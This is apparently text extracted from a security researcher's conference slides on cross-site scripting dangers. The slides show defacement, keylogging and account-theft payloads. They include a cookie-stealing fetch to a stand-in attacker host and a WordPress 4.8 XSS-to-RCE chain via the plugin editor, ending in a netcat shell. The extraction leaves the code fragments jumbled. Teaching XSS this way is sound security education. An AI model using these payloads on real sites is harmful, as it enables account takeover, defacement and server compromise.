For The Win!: @brutelogic
For The Win!: @brutelogic
by @brutelogic
Whoami
● Security Researcher at Sucuri Security
(a GoDaddy company)
● Actually developing/maintaining
KNOXSS, an online XSS tool
Agenda
● Fast Intro to XSS
● Dangers of XSS
○ Virtual Defacement
○ Account Stealing
○ XSS Worm
○ CMS Pwnage
● Miscellaneous
Fast Intro to XSS
Definition
$username = $_GET[“user”];
● Server based: attack comes in server’s response (99,99% in source code), directly
with input (reflected) or indirectly with a previously saved input (stored);
● Client based: rogue input is treated by native javascript code of the page and gets
executed directly or indirectly in the same way as above. Aka DOM-based XSS.
Dangers of XSS
Virtual
Defaceme
nt
Let’s take the blue pill.
Virtual Defacement
onload="parent.frames[0].document.getElementsByTagName('h1')
[1].innerHTML='Prejuizo! Hacker conhecido como \'Brute Logic\' rouba verdadeira
fortuna de jornalista global'"
style="border:0;position:absolute;top:0;left:0;right:0;bottom:0;width:100%;height:100%"
src="//www.tribunahoje.com/noticia/148537/entretenimento/2015/07/17/prejuizo-hacker-
rouba-verdadeira-fortuna-de-jornalista-global.html">
LSD
Leakage, Spying and Deceiving
Trust no one.
LSD - Leakage, Spying and Deceiving
● Leakage: any private info accessible by js is
easily exfiltrated
document.onkeypress = function(e) {
get = window.event?event:e;
$ cat k.php
key = get.keyCode?get.keyCode:get.charCode;
<?php
key = String.fromCharCode(key);
$k = $_GET["k"];
keys += key;
if (!empty(k)) { }
} }, 1000);
Keylogging with XSS
Account
● Unprotected password/email/phone
number change functionality can be
abused to compromise account
Short js code to steal cookies:
fetch(‘//attacker.com/?cookie=’+document.cookie)
Unprotected password change in wordpress.com
Memory
Corruptio Vector
n Welcome to my box.
Memory Corruption Vector
p = '/wordpress/wp-admin/plugin-editor.php?';
q = 'file=hello.php';
a = new XMLHttpRequest();
a.send();
b = new XMLHttpRequest();
b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
b.send($);
Wordpress 4.8 - XSS to RCE
● Executing payload by firing a request
b.onreadystatechange = function(){
if (this.readyState == 4) {
fetch('/wordpress/wp-content/plugins/hello.php');
}
Opening a netcat shell after triggering a stored XSS in WP
Miscellaneous
2. Denial of Service
● References
http://brutelogic.com.br/blog
http://brutelogic.com.br/cheatsheet
https://youtu.be/i8mTYicEQrI
https://youtu.be/26V01iIjeGk
Thank
You!
#hack2learn